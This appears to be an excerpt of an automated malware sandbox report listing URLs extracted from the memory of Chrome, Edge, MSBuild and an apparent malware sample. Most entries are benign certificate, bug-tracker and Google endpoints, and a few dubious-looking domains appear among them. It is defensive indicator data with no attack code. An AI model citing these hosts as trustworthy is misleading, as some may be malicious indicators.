Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/6929
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/6953
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7036
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1780351566.00007BAC01BDC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1775910979.00007BAC01BDC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7047
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7172
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7279
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7370
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1780351566.00007BAC01BDC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1775910979.00007BAC01BDC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7406
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7488
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7553
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7556
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7724
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7760
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7761
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/8162
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/8215
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/8229
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/8280
Source: msedge.exe, 00000009.00000003.1782618540.00007BAC0054C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ca.mtin.es/mtin/DPCyPoliticas0
Source: msedge.exe, 00000009.00000003.1782618540.00007BAC0054C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ca.mtin.es/mtin/DPCyPoliticas0g
Source: msedge.exe, 00000009.00000003.1782618540.00007BAC0054C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ca.mtin.es/mtin/crl/MTINAutoridadRaiz03
Source: msedge.exe, 00000009.00000003.1782618540.00007BAC0054C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ca.mtin.es/mtin/ocsp0
Source: msedge.exe, 00000009.00000003.1782618540.00007BAC0054C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz0
Source: msedge.exe, 00000009.00000003.1782618540.00007BAC0054C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://certs.oati.net/repository/OATICA2.crl0
Source: msedge.exe, 00000009.00000003.1782618540.00007BAC0054C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://certs.oati.net/repository/OATICA2.crt0
Source: msedge.exe, 00000009.00000003.1782618540.00007BAC0054C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://certs.oaticerts.com/repository/OATICA2.crl
Source: msedge.exe, 00000009.00000003.1782618540.00007BAC0054C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://certs.oaticerts.com/repository/OATICA2.crt08
Source: msedge.exe, 00000009.00000003.1782618540.00007BAC0054C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
Source: msedge.exe, 00000009.00000003.1782618540.00007BAC0054C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: msedge.exe, 00000009.00000003.1782618540.00007BAC0054C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cps.siths.se/sithsrootcav1.html0
Source: msedge.exe, 00000009.00000003.1782618540.00007BAC0054C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.certigna.fr/certignarootca.crl01
Source: msedge.exe, 00000009.00000003.1782618540.00007BAC0054C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.chambersign.org/chambersignroot.crl0
Source: msedge.exe, 00000009.00000003.1782618540.00007BAC0054C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: msedge.exe, 00000009.00000003.1787499005.00007BAC027AC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1784430418.00007BAC027AC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1782618540.00007BAC0054C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: msedge.exe, 00000009.00000003.1782618540.00007BAC0054C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.defence.gov.au/pki0
Source: msedge.exe, 00000009.00000003.1782618540.00007BAC0054C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.dhimyotis.com/certignarootca.crl0
Source: msedge.exe, 00000009.00000003.1782849401.00007BAC02ED4000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1782618540.00007BAC0054C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.postsignum.cz/crl/psrootqca4.crl02
Source: msedge.exe, 00000009.00000003.1782849401.00007BAC02ED4000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1782618540.00007BAC0054C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.postsignum.eu/crl/psrootqca4.crl0
Source: msedge.exe, 00000009.00000003.1782726508.00007BAC02F74000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1782618540.00007BAC0054C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.securetrust.com/SGCA.crl0
Source: msedge.exe, 00000009.00000003.1782726508.00007BAC02F74000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1782618540.00007BAC0054C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: msedge.exe, 00000009.00000003.1787499005.00007BAC027AC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1784430418.00007BAC027AC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1782618540.00007BAC0054C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: msedge.exe, 00000009.00000003.1782618540.00007BAC0054C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl1.comsign.co.il/crl/comsignglobalrootca.crl0
Source: msedge.exe, 00000009.00000003.1782849401.00007BAC02ED4000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1782618540.00007BAC0054C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl2.postsignum.cz/crl/psrootqca4.crl01
Source: msedge.exe, 00000009.00000003.1782618540.00007BAC0054C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://fedir.comsign.co.il/crl/comsignglobalrootca.crl0;
Source: msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://issuetracker.google.com/200067929
Source: x9Lh8czsmo.exe String found in binary or memory: http://james.newtonking.com/projects/json
Source: chrome.exe, 00000005.00000003.1617157787.0000123803268000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1616787068.0000123803258000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1617255144.000012380311C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1617383611.0000123803284000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://jsbin.com/temexa/4.
Source: msedge.exe, 00000009.00000003.1782618540.00007BAC0054C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.accv.es0
Source: msedge.exe, 00000009.00000003.1782618540.00007BAC0054C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pki.registradores.org/normativa/index.htm0
Source: msedge.exe, 00000009.00000003.1782618540.00007BAC0054C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://policy.camerfirma.com0
Source: chrome.exe, 00000005.00000003.1619091585.000012380340C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1618978566.0000123803300000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1617157787.0000123803268000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1617215965.00001238032B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1618772647.0000123802514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1616787068.0000123803258000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1618247283.0000123802970000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1617255144.000012380311C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1618205153.0000123803148000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1618176829.0000123802E8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1617383611.0000123803284000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1618369379.0000123803158000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://polymer.github.io/AUTHORS.txt
Source: chrome.exe, 00000005.00000003.1619091585.000012380340C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1618978566.0000123803300000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1617157787.0000123803268000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1617215965.00001238032B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1618772647.0000123802514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1616787068.0000123803258000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1618247283.0000123802970000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1617255144.000012380311C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1618205153.0000123803148000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1618176829.0000123802E8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1617383611.0000123803284000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1618369379.0000123803158000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
Source: chrome.exe, 00000005.00000003.1619091585.000012380340C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1618978566.0000123803300000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1617157787.0000123803268000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1617215965.00001238032B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1618772647.0000123802514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1616787068.0000123803258000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1618247283.0000123802970000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1617255144.000012380311C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1618205153.0000123803148000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1618176829.0000123802E8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1617383611.0000123803284000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1618369379.0000123803158000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://polymer.github.io/LICENSE.txt
Source: chrome.exe, 00000005.00000003.1619091585.000012380340C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1618978566.0000123803300000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1617157787.0000123803268000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1617215965.00001238032B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1618772647.0000123802514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1616787068.0000123803258000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1618247283.0000123802970000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1617255144.000012380311C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1618205153.0000123803148000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1618176829.0000123802E8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1617383611.0000123803284000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1618369379.0000123803158000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://polymer.github.io/PATENTS.txt
Source: msedge.exe, 00000009.00000003.1782618540.00007BAC0054C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://postsignum.ttc.cz/crl/psrootqca2.crl0
Source: msedge.exe, 00000009.00000003.1782618540.00007BAC0054C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://repository.swisssign.com/0
Source: x9Lh8czsmo.exe, 00000000.00000002.1426071903.0000000002971000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: msedge.exe, 00000009.00000003.1782618540.00007BAC0054C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://sertifikati.ca.posta.rs/crl/PostaCARoot.crl0
Source: msedge.exe, 00000009.00000003.1785247106.00007BAC03294000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://web.113989.com/?
Source: msedge.exe, 00000009.00000003.1782618540.00007BAC0054C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.acabogacia.org/doc0
Source: msedge.exe, 00000009.00000003.1782618540.00007BAC0054C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
Source: msedge.exe, 00000009.00000003.1782618540.00007BAC0054C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
Source: msedge.exe, 00000009.00000003.1782618540.00007BAC0054C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.accv.es/legislacion_c.htm0U
Source: msedge.exe, 00000009.00000003.1782618540.00007BAC0054C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.accv.es00
Source: msedge.exe, 00000009.00000003.1782618540.00007BAC0054C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.agesic.gub.uy/acrn/acrn.crl0)
Source: msedge.exe, 00000009.00000003.1782618540.00007BAC0054C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.agesic.gub.uy/acrn/cps_acrn.pdf0
Source: msedge.exe, 00000009.00000003.1782618540.00007BAC0054C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.ancert.com/cps0
Source: chromecache_165.7.dr String found in binary or memory: http://www.broofa.com
Source: msedge.exe, 00000009.00000003.1782618540.00007BAC0054C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.ca.posta.rs/dokumentacija0h
Source: msedge.exe, 00000009.00000003.1782987819.00007BAC02F78000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1782618540.00007BAC0054C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.cert.fnmt.es/dpcs/0
Source: msedge.exe, 00000009.00000003.1782618540.00007BAC0054C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.chambersign.org1
Source: msedge.exe, 00000009.00000003.1782618540.00007BAC0054C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.dnie.es/dpc0
Source: msedge.exe, 00000009.00000003.1782618540.00007BAC0054C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.ecee.gov.pt/dpc0
Source: msedge.exe, 00000009.00000003.1782945505.00007BAC02F94000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1782618540.00007BAC0054C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.firmaprofesional.com/cps0
Source: msedge.exe, 00000009.00000003.1782618540.00007BAC0054C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.globaltrust.info0
Source: msedge.exe, 00000009.00000003.1782618540.00007BAC0054C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.globaltrust.info0=
Source: msedge.exe, 00000009.00000003.1782618540.00007BAC0054C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.oaticerts.com/repository.
Source: msedge.exe, 00000009.00000003.1782618540.00007BAC0054C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.pki.admin.ch/cps/CPS_2_16_756_1_17_3_1_0.pdf09
Source: msedge.exe, 00000009.00000003.1782618540.00007BAC0054C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.postsignum.cz/crl/psrootqca2.crl02
Source: msedge.exe, 00000009.00000003.1782618540.00007BAC0054C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.quovadisglobal.com/cps0
Source: msedge.exe, 00000009.00000003.1782618540.00007BAC0054C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.uce.gub.uy/acrn/acrn.crl0
Source: msedge.exe, 00000009.00000003.1782618540.00007BAC0054C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.uce.gub.uy/informacion-tecnica/politicas/cp_acrn.pdf0G
Source: msedge.exe, 00000009.00000003.1782618540.00007BAC0054C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www2.postsignum.cz/crl/psrootqca2.crl01
Source: msedge.exe, 00000009.00000003.1785247106.00007BAC03294000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://zn728.tdg68.com
Source: msedge.exe, 00000009.00000003.1785247106.00007BAC03294000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://123.sogou.com/?
Source: MSBuild.exe, 00000002.00000002.1991362026.0000000003948000.00000004.00000020.00020000.00000000.sdmp, u3ecje.2.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: chrome.exe, 00000005.00000003.1630860312.00001238024A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport
Source: chrome.exe, 00000005.00000003.1630860312.00001238024A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/allowlist
Source: chrome.exe, 00000005.00000003.1630860312.00001238024A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/fine-allowlist
Source: chromecache_168.7.dr String found in binary or memory: https://accounts.google.com/o/oauth2/auth
